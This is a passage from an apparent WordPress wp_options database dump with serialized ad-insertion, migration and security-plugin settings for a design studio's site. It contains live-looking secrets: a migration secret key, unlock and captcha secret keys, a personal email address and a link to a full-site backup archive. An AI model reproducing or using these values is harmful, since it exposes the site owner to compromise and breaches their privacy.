12\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:13;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 13\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:14;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 14\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:15;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 15\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:16;a:71:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 16\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";s:4:\"Auto\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:11:\"electronics\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";s:6:\"On all\";s:22:\"enabled_on_which_posts\";s:6:\"On all\";s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}s:1:\"h\";a:6:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";}s:1:\"f\";a:6:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";}s:6:\"global\";a:19:{s:24:\"SYNTAX_HIGHLIGHTER_THEME\";s:11:\"ad_inserter\";s:12:\"VIEWPORT_CSS\";s:564:\".ai-viewport-3 { display: none !important;}\n.ai-viewport-2 { display: none !important;}\n.ai-viewport-1 { display: inherit !important;}\n.ai-viewport-0 { display: none !important;}\n@media (min-width: 768px) and (max-width: 979px) {\n.ai-viewport-1 { display: none !important;}\n.ai-viewport-2 { display: inherit !important;}\n}\n@media (max-width: 767px) {\n.ai-viewport-1 { display: none !important;}\n.ai-viewport-3 { display: inherit !important;}\n}\n\";s:7:\"VERSION\";s:6:\"020110\";s:16:\"BLOCK_CLASS_NAME\";s:10:\"code-block\";s:17:\"MINIMUM_USER_ROLE\";s:13:\"administrator\";s:20:\"STICKY_WIDGET_MARGIN\";i:15;s:15:\"PLUGIN_PRIORITY\";i:99999;s:14:\"DYNAMIC_BLOCKS\";i:0;s:28:\"PARAGRAPH_COUNTING_FUNCTIONS\";i:0;s:23:\"ADMIN_TOOLBAR_DEBUGGING\";s:1:\"1\";s:16:\"REMOTE_DEBUGGING\";s:1:\"0\";s:20:\"JAVASCRIPT_DEBUGGING\";s:1:\"0\";s:15:\"VIEWPORT_NAME_1\";s:7:\"Desktop\";s:16:\"VIEWPORT_WIDTH_1\";i:980;s:15:\"VIEWPORT_NAME_2\";s:6:\"Tablet\";s:16:\"VIEWPORT_WIDTH_2\";i:768;s:15:\"VIEWPORT_NAME_3\";s:5:\"Phone\";s:16:\"VIEWPORT_WIDTH_3\";i:0;s:9:\"TIMESTAMP\";i:1509009302;}s:7:\"extract\";a:5:{s:12:\"content_hook\";a:10:{i:0;a:1:{i:0;i:1;}i:3;a:1:{i:0;i:1;}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:1:{i:0;i:1;}i:2;a:1:{i:0;i:1;}i:7;a:0:{}i:8;a:0:{}i:10;a:1:{i:0;i:1;}}s:12:\"excerpt_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:15:\"loop_start_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:13:\"loop_end_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:9:\"post_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}}}','yes'),(523,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:32:\"amber.platts@vanillacircus.co.uk\";s:7:\"version\";s:5:\"5.8.6\";s:9:\"timestamp\";i:1666048828;}','no'),(86213,'ai1wm_secret_key','P6YZMwBN4BC9','yes'),(86216,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:352:\"<a href=\"http://www.dogstardesign.co.uk/wp-content/ai1wm-backups/www.dogstardesign.co.uk-20201008-121618-x5bi8r.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"www.dogstardesign.co.uk\" download=\"www.dogstardesign.co.uk-20201008-121618-x5bi8r.wpress\"><span>Download www.dogstardesign.co.uk</span><em>Size: 153 MB</em></a>\";}','yes'),(86246,'ai1wm_updater','a:0:{}','yes'),(105555,'wordfence_ls_version','1.0.6','yes'),(105556,'wfls_last_role_change','1624357908','no'),(105557,'wordfence_version','7.5.4','yes'),(105558,'wordfence_case','1','yes'),(105559,'wordfence_installed','1','yes'),(105560,'wordfenceActivated','1','yes'),(105561,'active_plugins','a:2:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1;s:23:\"wordfence/wordfence.php\";}','yes'),(105562,'wf_plugin_act_error','','yes'),(105790,'wordfence_syncAttackDataAttempts','0','no'),(105791,'wordfence_syncingAttackData','0','no'),(105793,'wordfence_lastSyncAttackData','1631547781','no'),(105972,'aiowpsec_db_version','1.9','yes'),(105973,'aio_wp_security_configs','a:92:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:0:\"\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";s:1:\"3\";s:24:\"aiowps_retry_time_period\";s:1:\"5\";s:26:\"aiowps_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"wox5f77uwmt1dx7rryk5\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:0:\"\";s:27:\"aiowps_allowed_ip_addresses\";s:0:\"\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"c9t0a4s63aehd8o6hcwz\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(105976,'_cerber_db_errors','a:7:{i:0;a:3:{i:0;s:54:\"Table \'dogstardesigncouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624621781.481968;}i:1;a:3:{i:0;s:54:\"Table \'dogstardesigncouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624621781.49323;}i:2;a:3:{i:0;s:54:\"Table \'dogstardesigncouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624621781.493314;}i:3;a:3:{i:0;s:54:\"Table \'dogstardesigncouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624621781.493387;}i:4;a:3:{i:0;s:54:\"Table \'dogstardesigncouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624621781.493456;}i:5;a:3:{i:0;s:54:\"Table \'dogstardesigncouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624621781.49353;}i:6;a:3:{i:0;s:54:\"Table \'dogstardesigncouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624621781.493601;}}','no'),(105977,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";s:0:\"\";s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";s:0:\"\";s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";s:0:\"\";s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\"